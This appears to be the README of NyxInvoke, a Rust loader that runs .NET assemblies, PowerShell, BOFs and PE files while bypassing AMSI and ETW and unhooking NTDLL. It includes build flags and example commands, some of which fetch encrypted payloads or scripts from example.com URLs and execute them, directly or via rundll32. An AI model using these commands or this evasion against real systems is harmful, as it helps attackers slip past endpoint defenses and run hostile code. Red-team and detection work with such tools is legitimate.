NyxInvoke is a versatile Rust-based tool designed for executing .NET assemblies, PowerShell commands/scripts, Beacon Object Files (BOFs) and PE files with built-in Ntdll Unhooking, patchless AMSI and ETW bypass capabilities. It can be compiled as either a standalone executable or a DLL.
- Execute .NET assemblies
- Run PowerShell commands or scripts
- Load and execute Beacon Object Files (BOFs)
- Load and execute PE Files (EXEs)
- Built-in patchless AMSI (Anti-Malware Scan Interface) bypass
- Built-in patchless ETW (Event Tracing for Windows) bypass
- Built-in NTDLL unhook without triggering the "PspCreateProcessNotifyRoutine" callback
- Support for encrypted payloads with AES decryption
- Flexible input options: local files, URLs, or compiled-in data
- Dual-build support: can be compiled as an executable or a DLL
NyxInvoke can be built as either an executable or a DLL. Use the following commands:
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib
To include compiled-in CLR, BOF or PE data, add the respective features:
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib
The executable supports three main modes of operation:
- CLR Mode (.NET assembly execution)
- PowerShell Mode
- BOF Mode (Beacon Object File execution)
- PE Mode (PE File execution)
NyxInvoke.exe <mode> [OPTIONS]
Where <mode>
is one of: clr
, ps
, bof
or pe
When compiled as a DLL, NyxInvoke can be executed using rundll32. The syntax is:
rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]
- CLR Mode:
Execute Common Language Runtime (CLR) assemblies
Usage: NyxInvoke.exe clr [OPTIONS]
-a, --args <ARGS>... Arguments to pass to the assembly
-b, --base <URL_OR_PATH> Base URL or path for resources
-k, --key <KEY_FILE> Path to the encryption key file
-i, --iv <IV_FILE> Path to the initialization vector (IV) file
-f, --assembly <ASSEMBLY_FILE> Path or URL to the encrypted assembly file to execute
-u, --unencrypted Whether the assembly is unencrypted (default is encrypted)
-h, --help Print help (see more with '--help')
Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
- BOF Mode:
Execute Beacon Object Files (BOF)
Usage: NyxInvoke.exe bof [OPTIONS]
-a, --args <ARGS>... Arguments to pass to the BOF
-b, --base <URL_OR_PATH> Base URL or path for resources
-k, --key <KEY_FILE> Path to the encryption key file
-i, --iv <IV_FILE> Path to the initialization vector (IV) file
-f, --bof <BOF_FILE> Path or URL to the encrypted BOF file to execute
-u, --unencrypted Whether the BOF is unencrypted (default is encrypted)
-h, --help Print help (see more with '--help')
Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
- PE Mode:
Execute Portable Executable (PE) files
Usage: NyxInvoke.exe pe [OPTIONS]
-a, --args <ARGS>... Arguments to pass to the PE
-b, --base <URL_OR_PATH> Base URL or path for resources
-k, --key <KEY_FILE> Path to the encryption key file
-i, --iv <IV_FILE> Path to the initialization vector (IV) file
-f, --pe <PE_FILE> Path or URL to the encrypted PE file to execute
-u, --unencrypted Whether the PE is unencrypted (default is encrypted)
-h, --help Print help (see more with '--help')
Example: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
- PowerShell Mode:
Execute PowerShell commands or scripts
Usage: NyxInvoke.exe ps [OPTIONS]
-c, --command <PS_COMMAND> PowerShell command to execute
-s, --script <PS_SCRIPT> Path or URL to the PowerShell script to execute
-h, --help Print help (see more with '--help')
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1
CLR Mode (Remote Execution):
NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
PowerShell Mode (Script Execution):
NyxInvoke.exe ps --script C:\path\to\script.ps1
BOF Mode (Local Execution):
NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
PE Mode (Compiled Execution):
NyxInvoke.exe pe --args arg1
CLR Mode (Remote Execution):
rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
PowerShell Mode (Direct Command Execution):
rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
BOF Mode (Compiled Execution):
rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
PE Mode (Local Execution Unencrypted):
rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2
In the resources
directory, you'll find several files to test NyxInvoke's functionality:
Encrypted CLR Assembly (Seatbelt):
- File:
- Description: An encrypted version of the Seatbelt tool, a C# project for gathering system information.
- Usage example:
NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
- File:
Encrypted BOF (Directory Listing):
- File:
- Description: An encrypted Beacon Object File that List user permissions for the specified file, wildcards supported.
- Usage example:
NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
- File:
Encrypted PE (Message Box):
- File:
- Description: An encrypted PE File that pop up message box.
- Usage example:
NyxInvoke.exe pe
- File:
Powershell (Message Box):
- File:
- Description: An Powershell script that pop up message box.
- Usage example:
NyxInvoke.exe ps -s http://example.com/ps.ps1
- File:
- Dll Compiled CLR Executaion
- EXE Remote BOF Executaion
- Dll Compiled EXE Executaion
- Dll Powershell Script Executaion
This tool is for educational and authorized testing purposes only. Ensure you have proper permissions before use in any environment.